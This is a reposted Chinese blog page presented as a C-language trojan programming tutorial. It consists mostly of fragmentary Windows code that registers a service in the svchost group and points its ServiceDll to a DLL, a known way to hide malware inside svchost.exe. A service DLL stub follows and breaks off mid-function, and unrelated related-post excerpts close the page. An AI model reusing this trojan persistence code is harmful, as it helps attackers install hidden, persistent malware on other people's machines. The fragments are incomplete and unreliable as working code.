1. 全栈程序员必看首页

c语言 木马编程教学,木马编程 之超强服务… 附代码 原创.

全栈程序员-站长 未分类 阅读 36

c语言 木马编程教学,木马编程 之超强服务… 附代码 原创.该楼层疑似违规已被系统折叠隐藏此楼查看此楼}BOOLAddSvchostGroup(VOID){HKEYhkey;//其实是一个句柄.if(RegOpenKey(HKEY_LOCAL_MACHINE,”SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\SvcHost”,&hkey)!=ERROR_SUCCESS)returnFALSE…

大家好,又见面了,我是你们的朋友全栈君。

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

}

BOOL AddSvchostGroup(VOID)

{

HKEY hkey;//其实是一个句柄.

if(

RegOpenKey(HKEY_LOCAL_MACHINE,

“SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost”,

&hkey)!=ERROR_SUCCESS

)

return FALSE;

if(

RegSetValueEx(hkey,m_ServiceInfo.ServiceName,0,REG_MULTI_SZ,

(BYTE *)m_ServiceInfo.ServiceName,lstrlen(m_ServiceInfo.ServiceName)) !=ERROR_SUCCESS

)

return FALSE;

RegCloseKey(hkey);

return TRUE;

}

//添加DLL 路径参数

BOOL AddParameters_ServiceDll(LPSTR DllPath)

{

HKEY hkey;//其实是一个句柄.

CHAR SubKey[255]={NULL};

sprintf(SubKey,”SYSTEM\\ControlSet001\\Services\\%s\\Parameters”,m_ServiceInfo.ServiceName);

if(RegCreateKey(HKEY_LOCAL_MACHINE,SubKey,&hkey)!=ERROR_SUCCESS)

return FALSE;

if(RegSetValueEx(hkey,”ServiceDll”,0,REG_EXPAND_SZ,(BYTE *)DllPath,lstrlen(DllPath)) !=ERROR_SUCCESS)

return FALSE;

RegCloseKey(hkey);

return TRUE;

}

int main(int argc, char* argv[])

{

CHAR BinPath[MAX_PATH]=”%SystemRoot%\\System32\\svchost.exe -k “;

strcat(BinPath,m_ServiceInfo.ServiceName);

puts(BinPath);

MyCreateServiceFuntion(BinPath);

AddSvchostGroup();

CHAR DllPath[]=”c:\\test.dll”;

AddParameters_ServiceDll(DllPath);

return 0;

}

//核心 DLL

#include “stdafx.h”

#include

char     svcname[MAX_PATH];

SERVICE_STATUS_HANDLE hServiceStatus;

int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )

{

SERVICE_STATUS srvStatus;

srvStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;

srvStatus.dwCurrentState = dwState;

srvStatus.dwControlsAccepted = SERVICE_ACCEPT_SHUTDOWN;

srvStatus.dwWin32ExitCode = dwExitCode;

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/147551.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • aop实现原理面试_aop ioc 面试怎么回答

    aop实现原理面试_aop ioc 面试怎么回答

    aop实现原理面试_aop ioc 面试怎么回答作用——用于处理系统中分布的各个模块的横切关注点(如:事务管理、日志、缓存等),是使用动态代理实现,在内存中临时为增强某个方法生成一个AOP对象,该对象含有目标对象的所有方法,在特定的切入点做了增强处理,并回调原来的方法。P:咋眼一看,不能直接理解很正常。动态代理的实现——主要分两种方式实现1、JDK动态代理原理说明——JDK动态管理通过反射接收被代理的类,该代理的类必须实现接口,核心是InvocationHandler和Proxy类。2、Cglib动态代理原理说明——Cglib通过.

    全栈程序员-站长的头像 全栈程序员-站长
    2025年11月30日
    7
  • JUnit 5和JUnit 4比较

    JUnit 5和JUnit 4比较

    JUnit 5和JUnit 4比较JUnit 5旨在调整java 8样式的编码,并且比JUnit 4更强大和灵活。在这篇文章中,JUnit 5 vs JUnit 4,我们将关注junit 4和junit 5之间的一些主要差异。1. JUnit 5 vs JUnit 4 – 注释两个版本中的大多数注释都是相同的,但很少有区别。这是一个快速比较。特征 JUNIT 4 JUNIT 5 声明一种测试方法 …

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月13日
    75
  • Windows程序设计——画圆[通俗易懂]

    Windows程序设计——画圆[通俗易懂]

    Windows程序设计——画圆[通俗易懂]代码如下:#include<windows.h>#include<stdlib.h>#include<string.h>long WINAPI WndProc(HWND hWnd,UINT iMessage,UINT wParam,LONG lParam);BOOL InitWindowsClass(HINSTANCE hInstance…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月18日
    15
  • WebConfig中常用的connectionStrings配置[通俗易懂]

    WebConfig中常用的connectionStrings配置[通俗易懂]

    WebConfig中常用的connectionStrings配置[通俗易懂]WEBCONFIG中常用的connectionStrings配置一般配置模板–语法示例<connectionStrings><add name=”connection” connectionString=”DataSource=10.42.44.228;InitialCatalog=leftover_sys;PersistSecurityInfo=True;UserID=root;Password=123456″ providerName=”S

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月11日
    38
  • 中文情感词典的构建与使用_文本情感识别

    中文情感词典的构建与使用_文本情感识别

    中文情感词典的构建与使用_文本情感识别首先,国外英文的情感分析已经取得了很好的效果,得益于英文单词自身分析的便捷性与英文大量的数据集WordNet。但由于中文的多变性,语义的多重性与数据集的缺乏,使得国内的情感分析暂落后于国外。本文将记录博主在项目中构建情感词典的经验,欢迎大家指正。我们首先将情感词典分为通用情感词典与专用情感词典。1.通用情感词典的构建通用情感词典的构建主要是通过将目前开源的情感词典整合起来,筛去重复和无…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月23日
    10
  • uwsgi停止[通俗易懂]

    uwsgi停止[通俗易懂]

    uwsgi停止[通俗易懂]uwsgi停止和nginx配置uwsgi停止nginx配置uwsgi停止必须在uwsgi.ini中配置好pidfile=绝对路径///uwsgi.pid这样才有pid文件uwsgi–stopuwsgi.pid这样就可以停止了有一点需要注意:如果没有uwsgi.pid又需要停止uwsgi服务可以netstat…

    全栈程序员-站长的头像 全栈程序员-站长
    2025年10月29日
    8

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号